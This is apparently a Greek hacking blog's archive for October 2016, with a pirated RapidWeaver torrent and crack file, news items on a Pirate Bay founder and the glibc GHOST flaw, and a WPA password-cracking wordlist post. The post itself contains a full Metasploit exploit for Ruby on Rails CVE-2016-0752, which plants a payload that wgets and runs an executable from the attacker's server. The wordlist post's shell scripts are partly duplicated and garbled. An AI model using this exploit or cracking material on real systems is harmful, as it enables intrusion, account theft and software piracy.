Web Analytics Made Easy - StatCounter
Οκτωβρίου 2016

31 Οκτωβρίου 2016

Μερικά Top Network Security Tools (1)

*Κάντε κλικ στο παρακάτω link και περιμένετε 5 δευτερόλεπτα
*Με αυτό μας βοηθάτε το FoulsCode.com να μην σταματάμε να βρίσκουμε καινούρια πράγματα συνεχεια και να τα μοιραζόμαστε στο blog ;)

>Network Security Tools....


Για την αντιμετώπιση κάποιον προβλημάτων στον blogger.com τα θέματα και τα αρχεία θα φιλοξενούνται σε άλλο server της εταιρίας xtgem.com

Διαβάστε Περισσότερα »

RapidWeaver 7.1.7

NameRapidWeaver 7.1.5
Size92.28 MB
Created on2016-10-18 23:51:01
Trackerhttp://109.235.50.166:2710/announce
Hash3a2d7082a450887672b17ab56b15d57235da3098
FilesRapidWeaver 7.1.5/RapidWeaver715.zip (91.81 MB)
RapidWeaver 7.1.5/cr-paddlekf23.dmg (474.6 kB)
Διαβάστε Περισσότερα »

27 Οκτωβρίου 2016

Ένοχος για hacking ένας εκ των ιδρυτών του The Pirate Bay (014)


2014
Ο Gottfrid Svartholm Warg, ένας εκ των τριών ιδρυτών του δημοφιλούς torrent site, The Pirate Bay, κατηγορήθηκε για υπόθεση hacking.



Δικαστήριο από την Δανία, έκρινε ένοχοτον Σουηδό Gottfrid Svartholm Warg (ήanakata), για υπόθεση hacking που είναι ανεξάρτητη με το The Pirate Bay και αντιμετωπίζει ποινή φυλάκισης 6 χρόνων.


Σύμφωνα με το Wired, το Δανέζικο δικαστήριο αποφάνθηκε ότι ο Svartholm Warg και οσυνένοχός του είναι ένοχοι για την υποκλοπή χιλιάδων αστυνομικών δελτίων ταυτότητας, δελτίων κοινωνικής ασφάλειας και άλλων ευαίσθητων προσωπικών δεδομένων από τους υπολογιστές του τεχνολογικού γίγαντα CSC.


Η επίθεση hacking αυτή έγινε τον Φεβρουάριο του 2012 από υπολογιστή που ανήκε στον Warg, ενώ οι συνήγοροι υπεράσπισης του υποστήριξαν ότι ο πελάτης τους έπεσεθύμα πλεκτάνης αφού κάποιος άλλος χάκερ κατέλαβε τον υπολογιστή του και διέπραξε τις κυβερνοεπιθέσεις.


[via]
Διαβάστε Περισσότερα »

26 Οκτωβρίου 2016

GHOST: ΤΟ LINUXΟ «ΦΑΝΤΑΣΜΑ» ΠΟΥ ΚΟΨΟΧΟΛΙΑΣΕ ΤΗΝ ΚΟΙΝΟΤΗΤΑ ΑΣΦΑΛΕΙΑΣ



Οι ερευνητές της εταιρείας ασφάλειας Qualys, κατά την διάρκεια ελέγχου ρουτίνας, ανακάλυψαν το 2015 μία ευπάθεια (vulnerability / κενό ασφάλειας) σε ένα ευρέως χρησιμοποιούμενο συστατικό πολλών διανομών Linux (στη βιβλιοθήκη glibc). Ο λόγος για την ευπάθεια CVE-2015-0235, που της έδωσαν το παρατσούκλι Ghost (Φάντασμα), δεδομένου ότι μπορεί να προκληθεί από τις συναρτήσεις «gethost» στο Linux. Το εν λόγω κενό ασφάλειας μπορεί να επιτρέψει σε έναν επιτιθέμενο να εκτελέσει εξ’ αποστάσεως κώδικα σ' έναν υπολογιστή που τρέχει λειτουργικό σύστημα Linux. Με απλά λόγια, η ευπάθεια Ghost (CVE-2015-0235), θεωρητικά, μπορεί να έχει ως αποτέλεσμα ο επιτιθέμενος να αποκτήσει απομακρυσμένη πρόσβαση στην συσκευή σας (και φυσικά και στον σέρβερ της εταιρείας σας για παράδειγμα) και να πάρει τον έλεγχο του συστήματος.

Η ευπάθεια υπάρχει στην βιβλιοθήκη GNU C (στην GNU έκδοση της πρότυπης βιβλιοθήκης της γλώσσας προγραμματισμού C), γνωστή και ως glibc, που είναι η υλοποίηση της πρότυπης βιβλιοθήκης της γλώσσας προγραμματισμού C του εγχειρήματος GNU και πρόκειται για μια συλλογή ανοιχτού κώδικα η οποία τροφοδοτεί χιλιάδες εφαρμογές και τις περισσότερες διανομές Linux, μεταξύ αυτών και εκείνες που διανέμονται στα routers αλλά και σε άλλους τύπους hardware (υλικού).
Με απλά λόγια, χωρίς την βιβλιοθήκη glibc, δεν θα μπορούσε να λειτουργήσει ένα σύστημα Linux.

Πολλές εταιρείες τότε έσπευσαν να βγάλουν ανακοινώσεις για το αν τα προϊόντα τους επηρεάζονται από την ευπάθεια, τονίζοντας ότι θα αναβαθμίσουν άμεσα τα λογισμικά τους που επηρεάζονται (όσα από τα λογισμικά τους, δηλαδή, βασίζονται πάνω στην πλατφόρμα Linux και περιλαμβάνουν το λογισμικό glibc), σημειώνοντας πως υπάρχει ήδη κώδικας που αποδεικνύει πρακτικά την θεωρία («proof of concept»), και λέγεται πως επιθέσεις που εκμεταλλεύονται την συγκεκριμένη ευπάθεια βρίσκονται προ των πυλών.

Η εταιρεία ασφάλειας Qualys, που ανακάλυψε την ευπάθεια CVE-2015-0235 κατά την διάρκεια τυπικού ελέγχου κώδικα, διαπίστωσε πως η συνάρτηση __nss_hostname_digits_dots() της βιβλιοθήκης GNU C Library κάνει την βιβλιοθήκη ευάλωτη σε buffer overflow (υπερχείλιση της μνήμης):


During a code audit performed internally at Qualys, we discovered a buffer overflow in the __nss_hostname_digits_dots() function of the GNU C Library (glibc). This bug is reachable both locally and remotely via the gethostbyname*() functions, so we decided to analyze it -- and its impact -- thoroughly, and named this vulnerability "GHOST".

δηλαδή:


Κατά την διάρκεια ενός τυπικού ελέγχου κώδικα που κάναμε στην Qualys, ανακαλύψαμε υπερχείλιση της μνήμης στην συνάρτηση του GNU C Library (glibc). Αυτό το σφάλμα είναι προσβάσιμο τόσο τοπικά, όσο και εξ αποστάσεως μέσω των συναρτήσεων gethostbyname*() της βιβλιοθήκης. Αποφασίσαμε λοιπόν να αναλύσουμε διεξοδικά την ευπάθεια - και τις επιπτώσεις της - και της δώσαμε το παρατσούκλι «GHOST» («ΦΑΝΤΑΣΜΑ»).



Λύση: αναβάθμιση σε glibc-2.18

Όσοι έχετε σταθερές και μακράς υποστήριξης διανομές, προσοχή γιατί η ευπάθεια ναι μεν διορθώθηκε, αλλά δεν αναγνωρίστηκε ως απειλή για την ασφάλεια. Και αυτό γιατί εκείνη την εποχή, δεν θεωρήθηκε ως κενό ασφάλειας, μα ως bug:


The first vulnerable version of the GNU C Library is glibc-2.2, released on November 10, 2000.

- We identified a number of factors that mitigate the impact of this bug.

In particular, we discovered that it was fixed on May 21, 2013 between the releases of glibc-2.17 and glibc-2.18).

Unfortunately, it was not recognized as a security threat; as a result, most stable and long-term-support distributions were left exposed (and still are):

Debian 7 (wheezy), Red Hat Enterprise Linux 6 & 7, CentOS 6 & 7, Ubuntu 12.04, for example.

δηλαδή:


Η πρώτη ευπαθή έκδοση της βιβλιοθήκης GNU C είναι το glibc-2.2 που κυκλοφόρησε την 10η Νοεμβρίου 2000.

- Έχουμε εντοπίσει μια σειρά από παράγοντες που αμβλύνουν τις επιπτώσεις αυτού του bug.

Ειδικότερα, ανακαλύψαμε ότι το bug (σφάλμα) διορθώθηκε την 21η Μαΐου του 2013, μετά την απελευθέρωση του glibc-2.17 και πριν το glibc-2.18.

Δυστυχώς, δεν αναγνωρίστηκε ως απειλή για την ασφάλεια· ως εκ τούτου, οι περισσότερες σταθερές και μακροχρόνιας υποστήριξης διανομές αφέθηκαν εκτεθειμένες (και είναι ακόμα), όπως για παράδειγμα:

το Debian 7 (wheezy), το Red Hat Enterprise Linux 6 & 7, το CentOS 6 & 7, και το Ubuntu 12.04.

Όλα αυτά βέβαια, τα μεταφέρουμε και με κάθε επιφύλαξη.

>>> Η ανακοίνωση της εταιρείας ασφάλειας για την ευπάθεια.

via: osarena.net
Διαβάστε Περισσότερα »

14 Οκτωβρίου 2016

Ruby on Rails Dynamic Render File Upload Remote Code Execution


This Metasploit module exploits a remote code execution vulnerability in the explicit render method when leveraging user parameters. This Metasploit module has been tested across multiple versions of Ruby on Rails. The technique used by this module requires the specified endpoint to be using dynamic render paths. Also, the vulnerable target will need a POST endpoint for the TempFile upload, this can literally be any endpoint. This Metasploit module does not use the log inclusion method of exploitation due to it not being universal enough. Instead, a new code injection technique was found and used whereby an attacker can upload temporary image files against any POST endpoint and use them for the inclusion attack. Finally, you only get one shot at this if you are testing with the builtin rails server, use caution.

MD5 | 330df82eae0981c2ca7cc8777a63a53c


require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper
def initialize(info = {}) super(update_info(info, 'Name' => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution', 'Description' => %q{ This module exploits a remote code execution vulnerability in the explicit render method when leveraging user parameters. This module has been tested across multiple versions of Ruby on Rails. The technique used by this module requires the specified endpoint to be using dynamic render paths, such as the following example:
def show render params[:id] end
Also, the vulnerable target will need a POST endpoint for the TempFile upload, this can literally be any endpoint. This module doesnt use the log inclusion method of exploitation due to it not being universal enough. Instead, a new code injection technique was found and used whereby an attacker can upload temporary image files against any POST endpoint and use them for the inclusion attack. Finally, you only get one shot at this if you are testing with the builtin rails server, use caution. }, 'Author' => [ 'mr_me ', # necromanced old bug & discovered new vector rce vector 'John Poulin (forced-request)' # original render bug finder ], 'References' => [ [ 'CVE', '2016-0752'], [ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'], # rails patch [ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'], # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016 [ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'], # John's original exploit ], 'License' => MSF_LICENSE, 'Platform' => ['linux', 'bsd'], 'Arch' => ARCH_X86, 'Payload' => { 'DisableNops' => true, }, 'Privileged' => false, 'Targets' => [ [ 'Ruby on Rails 4.0.8 July 2, 2014', {} ] # Other versions are also affected ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 16 2016')) register_options( [ Opt::RPORT(3000), OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/users"]), OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]), ], self.class) end
def check
# this is the check for the dev environment res = send_request_cgi({ 'uri' => normalize_uri(datastore['URIPATH'], "%2f"), 'method' => 'GET', }, 60)
# if the page controller is dynamically rendering, its for sure vuln if res and res.body =~ /render params/ return CheckCode::Vulnerable end
# this is the check for the prod environment res = send_request_cgi({ 'uri' => normalize_uri(datastore['URIPATH'], "%2fproc%2fself%2fcomm"), 'method' => 'GET', }, 60)
# if we can read files, its likley we can execute code if res and res.body =~ /ruby/ return CheckCode::Appears end return CheckCode::Safe end
def on_request_uri(cli, request) if (not @pl) print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") return end print_status("#{rhost}:#{rport} - Sending the payload to the server...") @elf_sent = true send_response(cli, @pl) end
def send_payload @bd = rand_text_alpha(8+rand(8)) fn = rand_text_alpha(8+rand(8)) un = rand_text_alpha(8+rand(8)) pn = rand_text_alpha(8+rand(8)) register_file_for_cleanup("/tmp/#{@bd}") cmd = "wget #{@service_url} -O /tmp/#{@bd};" cmd << "chmod 755 /tmp/#{@bd};" cmd << "/tmp/#{@bd}" pay = "<%=`#{cmd}`%>" print_status("uploading image...") data = Rex::MIME::Message.new data.add_part(pay, nil, nil, 'form-data; name="#{un}"; filename="#{fn}.gif"') res = send_request_cgi({ 'method' => 'POST', 'cookie' => @cookie, 'uri' => normalize_uri(datastore['URIPATH'], pn), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s }) if res and res.code == 422 and res.body =~ /Tempfile:\/(.*)>/ @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>/ return true else
# this is where we pull the log file if leak_log return true end end return false end
def leak_log
# path to the log /proc/self/fd/7 # this bypasses the extension check res = send_request_cgi({ 'uri' => normalize_uri(datastore['URIPATH'], "proc%2fself%2ffd%2f7"), 'method' => 'GET', }, 60)
if res and res.code == 200 and res.body =~ /Tempfile:\/(.*)>, @original_filename=/ @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>, @original_filename=/ return true end return false end
def start_http_server @pl = generate_payload_exe @elf_sent = false downfile = rand_text_alpha(8+rand(8)) resource_uri = '/' + downfile if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost) else srv_host = datastore['SRVHOST'] end
# do not use SSL for the attacking web server if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end
@service_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}" service_url_payload = srv_host + resource_uri print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) datastore['SSL'] = true if ssl_restore connect end
def render_tmpfile @path.gsub!(/\//, '%2f') res = send_request_cgi({ 'uri' => normalize_uri(datastore['URIPATH'], @path), 'method' => 'GET', }, 1) end
def exploit print_status("Sending initial request to detect exploitability") start_http_server if send_payload print_good("injected payload") render_tmpfile
# we need to delay, for the stager select(nil, nil, nil, 5) end endend
Διαβάστε Περισσότερα »

Dictionaries + Wordlists


Brief

Other than a mass of download links, this post also contains pretty pictures and confusing numbers which shows the break down of statistics regarding 17 wordlists. These wordlists, which the original source(s) can be found online, have been 'analysed', 'cleaned' and then 'sorted', for example:
Merged each 'collection' into one file (minus the 'readmes' files)
Removed leading & trailing spaces & tabs
Converted all 'new lines' to 'Unix' format
Removed non-printable characters
Removed HTML tags (Complete and common incomplete tags)
Removed (common domains) email addresses
Removed duplicate entries
How much would be used if they were for 'cracking WPA'(Between 8-63 characters)

It may not sound a lot - but after the process, the size of most wordlists are considerably smaller!
Method

Before getting the the results, each wordlist has been sorted differently rather than 'case sensitive A-Z'.

Each wordlist was:
Split into two parts - 'Single or two words' and 'multiple spaces'.
Sorted by the amount of times the word was duplicated - Therefore higher up the list, the more common the word is.
Sorted again by 'in-case sensitive A-Z'.
Joined back together - Single or two words at the start.

The reason for splitting into two parts was that 'most' passwords are either one or two words (containing one space in them). Words which have multiple spaces are mainly due to 'mistakes' with when/how the wordlists was created. So having them lower down, should increases the speed the password is discovered, without losing any possibility.

The justification of sorting by duplicated amount was the more common the word is, the higher the chance the word would be used! If you don't like this method, you can sort it yourself back to case sensitive A-Z, however it can't be sorted how it was - due to the lists not having (hopefully) any duplicates in them!

When removing HTML tags and/or email addresses, it doesn't mean that it wasn't effective. If the word has contained some HTML tags and it was still unique afterwords, it wouldn't change the line numbers, it would improve the wordlist & it still could be unique It is also worth mentioning, due to a general rule of 'search & replace', it COULD of removed a few false positives. It is believed that the amount removed to the predicted estimated amount is worth it. For example instead of having three passwords like below, it would be more worth while to have just the two passwords:
user1@company.com:password1
user2@company.com:password1
user3@company.com:password2

Download links for each collection which has been 'cleaned' is in the table below along with the results found and graphs. '17-in-1' is the combination of the results produced from each of the 17 collections. The extra addition afterwords (18-in-1), is a mixture of random wordlists (Languages (AIO), Random & WPA/WPA2) which I have accumulated. You can view & download them here (along with all the others!). '18-in-1 [WPA]', is a 'smaller' version of 18-in-1, with JUST words between 8-63 characters.
Source

UPDATE: Will re-upload soon



Collection Name (Original Source)Lines & Size (Extracted / Compressed)DownloadMD5Collection of Wordlist v.2 374806023 (3.9GB / 539MB) Part 1, Part 2, Part 3 5510122c3c27c97b2243208ec580cc67
HuegelCDC 53059218 (508MB / 64MB) Part 1 52f42b3088fcb508ddbe4427e8015be6
Naxxatoe-Dict-Total-New 4239459985 (25GB / 1.1GB) Part 1, Part 2, Part 3 Part 4, Part 5, Part 6 e52d0651d742a7d8eafdb66283b75e12
Purehates Word list 165824917 (1.7GB / 250MB) Part 1, Part 2 c5dd37f2b3993df0b56a0d0eba5fd948
theargonlistver1 4865840 (52MB / 15MB) Part 1 b156e46eab541ee296d1be3206b0918d
theargonlistver2 46428068 (297MB / 32MB) Part 1 41227b1698770ea95e96b15fd9b7fc6a
theargonlistver2-v2 (word.lst.s.u.john.s.u.200) 244752784 (2.2GB / 219MB) Part 1, Part 2 36f47a35dd0d995c8703199a09513259
WordList Collection 472603140 (4.9GB / 1.4GB) Part 1, Part 2, Part 3, Part 4, Part 5, Part 6, Part 7 a76e7b1d80ae47909b5a0baa4c414194
wordlist-final 8287890 (80MB / 19MB) Part 1 db2de90185af33b017b00424aaf85f77
wordlists-sorted 65581967 (687MB / 168MB) Part 1 2537a72f729e660d87b4765621b8c4bc
wpalist 37520637 (422MB / 66MB) Part 1 9cb032c0efc41f2b377147bf53745fd5
WPA-PSK WORDLIST (40 MB) 2829412 (32MB / 8.7MB) Part 1 de45bf21e85b7175cabb6e41c509a787
WPA-PSK WORDLIST 2 (107 MB) 5062241 (55MB / 15MB) Part 1 684c5552b307b4c9e4f6eed86208c991
WPA-PSK WORDLIST 3 Final (13 GB) 611419293 (6.8GB / 1.4GB) Part 1, Part 2, Part 3, Part 4, Part 5, Part 6, Part 7 58747c6dea104a48016a1fbc97942c14
-=Xploitz=- Vol 1 - PASSWORD DVD 100944487 (906MB / 109MB) Part 1 38eae1054a07cb894ca5587b279e39e4
-=Xploitz=- Vol 2 - Master Password Collection 87565344 (1.1GB / 158MB) Part 1 53f0546151fc2c74c8f19a54f9c17099
-=Xploitz Pirates=- Masters Password Collection #1! -- Optimized 79523622 (937MB / 134MB) Part 1 6dd2c32321161739563d0e428f5362f4
17-in-1 5341231112 (37GB / 4.5GB) Part 1 - Part 24 d1f8abd4cb16d2280efb34998d41f604
18-in-1 5343814622 (37GB / 4.5GB) Part 1 - Part 24 aee6d1a230fdad3b514a02eb07a95226
18-in-1 [WPA Edition] 1130701596 (12.6GB / 2.9GB) Part 1 - Part 15 425d47c549232b62dbb0e71b8394e9d9

Results
Table 1 - Raw Data


Table 2 - Calculated Differences


Table 3 - Summary


Graph 1 - Number of lines in a collection


Graph 2 - Percentage of unique words in a collection


Graph 3 - Number of lines removed during claning


Graph 4 - Percentage of content removed


Graph 5 - Percentage of words between 8-63 characters (WPA)

Red means it is MEANT for WPA

A few notes about the results:
In the tables - 'Purehates' wordlist is corrupt and towards the end, it contains 'rubbish' (non-printable characters). Which is why it is highlighted red, as it isn't complete. I was unable to find the original.
Table 3 which summarizes the results - shows that 57% of the 17 collections are unique. Therefore 43% of it would be wasted due to duplication if it was tested - that's a large amount of extra un-needed attempts!
In graph 2 - Only one collection was 100% 'unique', which means most of the collections sizes have been reduced.
In graph 5 - which is for showing how effective it would be towards cracking WPA. The four wordlists which were 'meant' for WPA, are in red.

In a few of the 'readme' file (which wasn't included when merging), several of them claimed to of have duplicates removed. However, unless the list is sorted, the bash program 'uniq', wouldn't remove the duplicates. By piping the output of sort, uniq should then remove the duplicates. However, using sort takes time, and with a bit of 'awk fu', awk '!x[$0]++ [filename]', removes the need to sort.

For example:
Valueuniqsort / uniq or awk '!x[$0]++'word1,word2,word2,word3 word1,word2,word3 word1,word2,word3
word1,word2,word2,word3,word1 word1,word2,word3,word1 word1,word2,word3
word1,word2,word1,word1,word2,word3,word1 word1,word2,word1,word2,word3,word1 word1,word2,word3

Commands

The commands used were:
Step By Step


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25
# Merging rm -vf CREADME CHANGELOG* readme* README* stage* echo "Number of files:" `find . -type f | wc -l` cat * > /tmp/aio-"${PWD##*/}".lst && rm * && mv /tmp/aio-"${PWD##*/}".lst ./ && wc -l aio-"${PWD##*/}".lst file -k aio-"${PWD##*/}".lst # Uniq Lines cat aio-"${PWD##*/}".lst | sort -b -f -i -T "$(pwd)/" | uniq > stage1 && wc -l stage1 # "Clean" Lines tr '\r' '\n' < stage1 > stage2-tmp && rm stage1 && tr '# Merging rm -vf CREADME CHANGELOG* readme* README* stage* echo "Number of files:" `find . -type f | wc -l` cat * > /tmp/aio-"${PWD##*/}".lst && rm * && mv /tmp/aio-"${PWD##*/}".lst ./ && wc -l aio-"${PWD##*/}".lst file -k aio-"${PWD##*/}".lst # Uniq Lines cat aio-"${PWD##*/}".lst | sort -b -f -i -T "$(pwd)/" | uniq > stage1 && wc -l stage1 # "Clean" Lines tr '\r' '\n' < stage1 > stage2-tmp && rm stage1 && tr '\0' ' ' < stage2-tmp > stage2-tmp1 && rm stage2-tmp && tr -cd '\11\12\15\40-\176' < stage2-tmp1 > stage2-tmp && rm stage2-tmp1 cat stage2-tmp | sed "s/ */ /gI;s/^[ \t]*//;s/[ \t]*$//" | sort -b -f -i -T "$(pwd)/" | uniq > stage2 && rm stage2-* && wc -l stage2 # Remove HTML Tags htmlTags="a|b|big|blockquote|body|br|center|code|del|div|em|font|h[1-9]|head|hr|html|i|img|ins|item|li|ol|option|p|pre|s|small|span|strong|sub|sup|table|td|th|title|tr|tt|u|ul" cat stage2 | sed -r "s/<[^>]*>//g;s/^\w.*=\"\w.*\">//;s/^($htmlTags)>//I;s/<\/*($htmlTags)$//I;s/&*/&/gI;s/"/\"/gI;s/'/'/gI;s/'/'/gI;s/</
stage3 && wc -l stage3 && rm stage2 # Remove Email addresses cat stage3 | sed -r "s/\w.*\@.*\.(ac|ag|as|at|au|be|bg|bill|bm|bs|c|ca|cc|ch|cm|co|com|cs|de|dk|edu|es|fi|fm|fr|gov|gr|hr|hu|ic|ie|il|info|it|jo|jp|kr|lk|lu|lv|me|mil|mu|net|nil|nl|no|nt|org|pk|pl|pt|ru|se|si|tc|tk|to|tv|tw|uk|us|ws|yu):*//gI" | sort -b -f -i -T "$(pwd)/" | uniq > stage4 && wc -l stage4 && rm stage3 # Misc pw-inspector -i aio-"${PWD##*/}".lst -o aio-"${PWD##*/}"-wpa.lst -m 8 -M 63 ; wc -l aio-"${PWD##*/}"-wpa.lst && rm aio-"${PWD##*/}"-wpa.lst pw-inspector -i stage4 -o stage5 -m 8 -M 63 ; wc -l stage5 7za a -t7z -mx9 -v200m stage4.7z stage4 du -sh * ' ' ' < stage2-tmp > stage2-tmp1 && rm stage2-tmp && tr -cd '1250-76' < stage2-tmp1 > stage2-tmp && rm stage2-tmp1 cat stage2-tmp | sed "s/ */ /gI;s/^[ \t]*//;s/[ \t]*$//" | sort -b -f -i -T "$(pwd)/" | uniq > stage2 && rm stage2-* && wc -l stage2 # Remove HTML Tags htmlTags="a|b|big|blockquote|body|br|center|code|del|div|em|font|h[1-9]|head|hr|html|i|img|ins|item|li|ol|option|p|pre|s|small|span|strong|sub|sup|table|td|th|title|tr|tt|u|ul" cat stage2 | sed -r "s/<[^>]*>//g;s/^\w.*=\"\w.*\">//;s/^($htmlTags)>//I;s/<\/*($htmlTags)$//I;s/&*/&/gI;s/"/\"/gI;s/'/'/gI;s/'/'/gI;s/</ stage3 && wc -l stage3 && rm stage2 # Remove Email addresses cat stage3 | sed -r "s/\w.*\@.*\.(ac|ag|as|at|au|be|bg|bill|bm|bs|c|ca|cc|ch|cm|co|com|cs|de|dk|edu|es|fi|fm|fr|gov|gr|hr|hu|ic|ie|il|info|it|jo|jp|kr|lk|lu|lv|me|mil|mu|net|nil|nl|no|nt|org|pk|pl|pt|ru|se|si|tc|tk|to|tv|tw|uk|us|ws|yu):*//gI" | sort -b -f -i -T "$(pwd)/" | uniq > stage4 && wc -l stage4 && rm stage3 # Misc pw-inspector -i aio-"${PWD##*/}".lst -o aio-"${PWD##*/}"-wpa.lst -m 8 -M 63 ; wc -l aio-"${PWD##*/}"-wpa.lst && rm aio-"${PWD##*/}"-wpa.lst pw-inspector -i stage4 -o stage5 -m 8 -M 63 ; wc -l stage5 7za a -t7z -mx9 -v200m stage4.7z stage4 du -sh *

AIO

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28
rm -f stage* echo "Number of files:" `find . -type f | wc -l` cat * > /tmp/aio-"${PWD##*/}".lst && rm * && mv /tmp/aio-"${PWD##*/}".lst ./ tr '\r' '\n' < aio-"${PWD##*/}".lst > stage1-tmp && tr 'rm -f stage* echo "Number of files:" `find . -type f | wc -l` cat * > /tmp/aio-"${PWD##*/}".lst && rm * && mv /tmp/aio-"${PWD##*/}".lst ./ tr '\r' '\n' < aio-"${PWD##*/}".lst > stage1-tmp && tr '\0' ' ' < stage1-tmp > stage1-tmp1 && tr -cd '\11\12\15\40-\176' < stage1-tmp1 > stage1-tmp && mv stage1-tmp stage1 && rm stage1-* # End Of Line/New Line & "printable" htmlTags="a|b|big|blockquote|body|br|center|code|del|div|em|font|h[1-9]|head|hr|html|i|img|ins|item|li|ol|option|p|pre|s|small|span|strong|sub|sup|table|td|th|title|tr|tt|u|ul" cat stage1 | sed -r "s/ */ /gI;s/^[ \t]*//;s/[ \t]*$//;s/<[^>]*>//g;s/^\w.*=\"\w.*\">//;s/^($htmlTags)>//I;s/<\/*($htmlTags)$//I;s/&*/&/gI;s/"/\"/gI;s/'/'/gI;s/'/'/gI;s/</
stage2 && rm stage1 sort -b -f -i -T "$(pwd)/" stage2 > stage3 && rm stage2 grep -v " * .* " stage3 > stage3.1 grep " * .* " stage3 > stage3.4 #grep -v " * .* \| " stage3 > stage3.1 # All one or two words #grep " * .* " stage3 | grep -v " " > stage3.2 # All 3+ words #grep " * .* " stage3 | grep " " > stage3.3 # All multiple spacing words rm stage3 for fileIn in stage3.*; do # Place one or two words at the start, cat "$fileIn" | uniq -c -d > stage3.0 # Sort, then find dups (else uniq could miss out a few values if the list wasn't in order e.g. test1 test2 test3, test2, test4) sort -b -f -i -T "$(pwd)/" -k1,1r -k2 stage3.0 > stage3 && rm stage3.0 # Sort by amount of dup times (9-0) then by the value (A-Z) sed 's/^ *//;s/^[0-9]* //' stage3 >> "${PWD##*/}"-clean.lst && rm stage3 # Remove "formatting" that uniq adds (Lots of spaces at the start) cat "$fileIn" | uniq -u >> "${PWD##*/}"-clean.lst # Sort, then add unique values at the end (A-Z) rm "$fileIn" done rm -f stage* #aio-"${PWD##*/}".lst #7za a -t7z -mx9 -v200m "${PWD##*/}".7z "${PWD##*/}".lst wc -l "${PWD##*/}"-clean.lst md5sum "${PWD##*/}"-clean.lst ' ' ' < stage1-tmp > stage1-tmp1 && tr -cd '1250-76' < stage1-tmp1 > stage1-tmp && mv stage1-tmp stage1 && rm stage1-* # End Of Line/New Line & "printable" htmlTags="a|b|big|blockquote|body|br|center|code|del|div|em|font|h[1-9]|head|hr|html|i|img|ins|item|li|ol|option|p|pre|s|small|span|strong|sub|sup|table|td|th|title|tr|tt|u|ul" cat stage1 | sed -r "s/ */ /gI;s/^[ \t]*//;s/[ \t]*$//;s/<[^>]*>//g;s/^\w.*=\"\w.*\">//;s/^($htmlTags)>//I;s/<\/*($htmlTags)$//I;s/&*/&/gI;s/"/\"/gI;s/'/'/gI;s/'/'/gI;s/</ stage2 && rm stage1 sort -b -f -i -T "$(pwd)/" stage2 > stage3 && rm stage2 grep -v " * .* " stage3 > stage3.1 grep " * .* " stage3 > stage3.4 #grep -v " * .* \| " stage3 > stage3.1 # All one or two words #grep " * .* " stage3 | grep -v " " > stage3.2 # All 3+ words #grep " * .* " stage3 | grep " " > stage3.3 # All multiple spacing words rm stage3 for fileIn in stage3.*; do # Place one or two words at the start, cat "$fileIn" | uniq -c -d > stage3.0 # Sort, then find dups (else uniq could miss out a few values if the list wasn't in order e.g. test1 test2 test3, test2, test4) sort -b -f -i -T "$(pwd)/" -k1,1r -k2 stage3.0 > stage3 && rm stage3.0 # Sort by amount of dup times (9-0) then by the value (A-Z) sed 's/^ *//;s/^[0-9]* //' stage3 >> "${PWD##*/}"-clean.lst && rm stage3 # Remove "formatting" that uniq adds (Lots of spaces at the start) cat "$fileIn" | uniq -u >> "${PWD##*/}"-clean.lst # Sort, then add unique values at the end (A-Z) rm "$fileIn" done rm -f stage* #aio-"${PWD##*/}".lst #7za a -t7z -mx9 -v200m "${PWD##*/}".7z "${PWD##*/}".lst wc -l "${PWD##*/}"-clean.lst md5sum "${PWD##*/}"-clean.lst


If you're wanting to try this all out for your self, you can find some more wordlists here:
http://www.skullsecurity.org/wiki/index.php/Passwords
http://trac.kismac-ng.org/wiki/wordlists
http://hashcrack.blogspot.com/p/wordlist-downloads_29.html
http://packetstormsecurity.org/Crackers/wordlists/
http://0x80.org/wordlist/
http://dictionary-thesaurus.com/wordlists.html
http://www.outpost9.com/files/WordLists.html
http://www.openwall.com/passwords/wordlists/
http://dictionary-thesaurus.com/Wordlists.html
http://en.wikipedia.org/wiki/Wikipedia_database#Where_do_I_get... & http://blog.sebastien.raveau.name/2009/03/cracking-passwords-with-wikipedia.html
http://www.isdpodcast.com/resources/62k-common-passwords/
Moving forwards

As mentioned at the start, whilst having gigabytes worth of wordlists may be good and all... having a personalised/specific/targeted wordlist is great. PaulDotCom (great show by the way), did just that a while back.

As the password has to be in the wordlist, and if it doesn't have the correct password you could try crunch (or L517 for windows) to generate your own. For a few good tutorials on how to use crunch, check here and here (I highly recommend ADayWithTape's blog).

As waiting for a mass of words to be tried takes some time - it could be sped up by 'pre-hashing'. For example this WPA-PSK is vulnerable, however WPA-PSK is 'Salted' (By using the SSID as the salt). This means that each pre-hashes table is only valid for THAT salt/SSID. This isn't going to turn into another 'How to crack WPA', as its already been done. It was just mentioned due to this and this could help speed up the process.

Instead of brute forcing your way in, by 'playing it smart', it could be possible to generate/discover the password instead. This works if the algorithm has a weakness, for example here, or if the system is poor, for example here. However, finding a weakness might take longer than trying a wordlist (or three!).

When compiling all of this, I came across this, Most 'professional password guessers' known:
There is a 50 percent chance that a user's password will contain one or more vowels.
If it contains a number, it will usually be a 1 or 2, and it will be at the end.
If it contains a capital letter, it will be at the beginning, followed by a vowel.
